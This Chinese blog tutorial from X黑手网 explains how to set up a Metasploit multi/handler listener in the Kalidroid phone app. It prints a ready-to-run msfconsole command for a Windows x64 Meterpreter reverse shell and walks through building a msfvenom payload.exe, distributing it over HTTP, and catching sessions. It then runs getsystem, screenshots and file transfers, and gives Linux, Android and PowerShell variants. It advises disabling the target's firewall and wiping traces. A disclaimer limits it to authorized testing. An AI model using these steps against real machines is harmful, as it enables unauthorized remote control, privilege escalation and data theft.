前言
在 msfvenom 生成后门木马后,必须开启监听端口才能捕获目标主机反弹回来的 Meterpreter 控制会话。Kalidroid 将 Metasploit 的 multi/handler 独立封装为Handler 图形化模块,轻量化后台监听,无需完整加载 msfconsole 控制台,占用手机资源更低,专门配合自制 exe/elf/apk 后门使用。
本文基于 (华为p90 ,Kalidroid v1.3.29-debug)全套实操截图,完整讲解 Handler 监听配置、参数含义、后台持久监听全流程,操作仅限拥有书面合法授权的测试环境。
一、Handler 模块入口与功能定位
1. 进入模块
打开 Kalidroid 主界面→Metasploit 功能页,在 MODE 分区选择红色高亮的 Handler 模式,页面标注状态
Ready to listen,代表监听功能就绪。

四种运行模式区分:
| 模式 | 核心用途 | 使用场景 |
|---|---|---|
| msfconsole | 完整交互式控制台,漏洞攻击 + 监听一体 | 漏洞模块直接利用场景 |
| msfvenom | 生成各类系统反弹后门载荷 | 制作 exe/elf/apk 木马 |
| Handler | 独立轻量化端口监听程序(本文核心) | 配合 msfvenom 生成的木马,单独等待反弹会话 |
| msfrpcd | MSF 远程 RPC 接口服务 | 自动化脚本、第三方工具联动 |
模块简介:
Start a multi/handler listener — quickest way to catch a callback.
翻译:启动多架构通用监听器,捕获目标回连会话最高效的方式。
二、全界面参数详细解析
1. 有效载荷(Payload)选择区
软件内置全平台反弹载荷,必须和 msfvenom 生成木马时选用的载荷完全一致,否则无法捕获会话:
- Windows 系列(本次实操选用)
meterpreter (win x64):64 位 Windows 系统交互式 shell,对应 exe 木马meterpreter (win x86):32 位老旧 Windows 系统shell (win x64):极简 cmd 反弹,无 meterpreter 高级功能
- Linux 系列
meterpreter (linux x64/arm64):服务器、ARM 设备 elf 后门配套监听
- Android 系列
meterpreter (android):APK 安卓木马专用载荷
- 脚本类载荷
python/php reverse_tcp、powershell 无文件脚本载荷
本次实操选中
meterpreter (win x64),自动填充载荷字符串:
windows/x64/meterpreter/reverse_tcp
2. 监听器核心配置(LHOST / LPORT)
这是监听成功的核心参数,必须与生成木马时填写数值完全匹配:
- LHOST:手机局域网回连 IP,示例
192.168.10.6内网测试填写本机 WiFi 局域网 IP;外网公网测试填写公网 IP,路由器做好端口转发。
- LPORT:监听端口,标准通用 4444,可自定义 5000、8080 等未被占用端口。
💡界面提示解读:
LHOST 是目标回连地址;虚拟机内部 SLARP 网关 IP 为 10.0.2.15,若开启端口转发,则填写手机局域网 IP。

3. 自定义高级稳定参数
AutoRunScript=multi_console_command · ExitOnSession=false
参数作用拆解:
ExitOnSession=false:一条会话断开后,监听不会终止,持续等待新的设备反弹上线(多台设备批量渗透必备)AutoRunScript=multi_console_command:会话成功上线后,自动预设执行脚本,省去手动输入命令操作
4. 全局运行设置开关
- 自动初始化 msfdb:开启后会话、主机信息存入 MSF 数据库,支持后续资产查看;仅单纯监听可关闭节省内存
- 安静横幅(-q):跳过 MSF 启动大段 ASCII 艺术字符,加快监听启动速度
- ANSI 颜色:开启终端彩色日志,区分会话上线绿色提示、报错红色日志
5. 命令预览与启动按钮
页面自动拼接完整可执行监听命令,支持一键复制;
确认所有参数无误后,点击底部蓝色按钮 Start Handler 启动后台监听。
自动生成完整命令示例:
kalidroid-msfdb; msfconsole -q -x 'workspace default; use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 192.168.10.6; set LPORT 4444; set ExitOnSession false; run'

三、完整配套渗透操作流程(结合 msfvenom)
步骤 1:msfvenom 生成对应载荷木马
- Metasploit 切换 msfvenom 模式,选择
windows/x64/meterpreter/reverse_tcp - LHOST 填手机局域网 IP
192.168.10.6,LPORT=4444,输出格式 exe - 一键生成
payload.exe后门程序,通过 Python HTTP 服务分发至目标 Windows 设备
步骤 2:切换 Handler 模块配置监听
- MODE 切换为 Handler,载荷选择与木马一致的
meterpreter (win x64) - LHOST、LPORT 和生成木马时保持完全相同
- 自定义参数添加
ExitOnSession=false,开启持久监听 - 点击
Start Handler,后台开启 4444 端口等待回连
步骤 3:目标运行木马,捕获 Meterpreter 会话
- Windows 设备双击运行
payload.exe - 目标主动向手机 192.168.10.6:4444 发起 TCP 连接
- Handler 监听器捕获会话,自动进入 Meterpreter 交互终端,可执行:
sysinfo:查询目标系统版本、硬件架构getsystem:提升至 Windows 系统最高管理员权限screenshot:截取目标电脑实时桌面upload/download:双向传输本地文件与目标主机文件
四、多场景载荷监听配置方案
场景 1:Windows exe 后门监听(本文案例)
- 载荷:windows/x64/meterpreter/reverse_tcp
- LPORT:4444
- 自定义参数:ExitOnSession=false(持续监听多台设备)
场景 2:Linux 服务器 elf 后门监听
- 载荷:linux/x64/meterpreter/reverse_tcp
- LPORT:5555
- 输出匹配 msfvenom 生成的 elf 文件
场景 3:Android APK 木马监听
- 载荷:android/meterpreter/reverse_tcp
- LPORT:8080
- 适合移动端测试设备反弹控制
场景 4:Powershell 无内存文件后门监听
- 载荷:windows/x64/powershell/reverse_tcp
- 无需生成 exe 文件,复制脚本直接在 Windows 终端执行
五、常见故障排查指南
| 故障现象 | 故障根源 | 解决办法 |
|---|---|---|
| 运行木马无任何会话上线 | 1.LHOST/LPORT 参数和木马不一致;2. 监听未提前启动;3. 目标防火墙拦截出站 4444 端口 | 核对两边 IP、端口完全一致;先启动 Handler 再运行木马;关闭目标防火墙放行 4444 端口 |
| 单台设备下线后监听直接关闭 | 未添加ExitOnSession=false参数 |
在自定义参数框填入该配置,开启持久监听 |
| 监听启动卡顿闪退 | 手机内存不足,自动初始化 msfdb 占用资源 | 关闭「自动初始化 msfdb」开关,无数据库模式启动 |
| 提示载荷不匹配无法捕获会话 | Handler 与 msfvenom 选用的 payload 架构不一致 | 两边统一 win x64/win x86/linux 等对应载荷 |
| 外网公网环境木马连不上监听 | 未做路由器端口转发;LHOST 填写内网 IP 而非公网 IP | 路由器转发 LPORT 端口;LHOST 填写宽带公网 IP |
六、合规安全警示 ⚠️
- 严禁对无书面授权的电脑、服务器、智能设备生成后门、开启监听、获取控制会话,私自监听、入侵第三方设备违反《网络安全法》《刑法》,需承担民事、刑事责任。
- 测试完成后,必须点击关闭 Handler 监听,删除所有生成的后门程序,清空终端会话日志,消除测试痕迹。
- 本教程仅用于企业内部安全自查、授权漏洞演练、网络安全专业学习,禁止用于窃取数据、破坏系统、牟利等恶意用途。
教程总结
- Handler 是 Kalidroid 独立轻量化监听模块,专门配合 msfvenom 自制后门使用,比完整 msfconsole 占用资源更少;
- 监听成功核心三要素:载荷完全匹配、LHOST/LPORT 和木马参数一致、提前启动监听;
- 添加
ExitOnSession=false可实现多设备持久监听,批量捕获内网反弹会话; - 完整渗透链路:Nmap 扫描存活主机 → msfvenom 生成对应系统后门 → Handler 开启端口监听 → 目标运行木马获取 Meterpreter 控制会话。
系列教程回顾
- Kalidroid Nmap 内网端口扫描实战
- Kalidroid SubFinder 子域名资产挖掘
- Kalidroid msfconsole 漏洞利用(BlueKeep 案例)
- Kalidroid msfvenom 后门载荷生成与内网分发
- 本篇:Kalidroid Handler 独立反弹监听器完整实操
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
THE END









暂无评论内容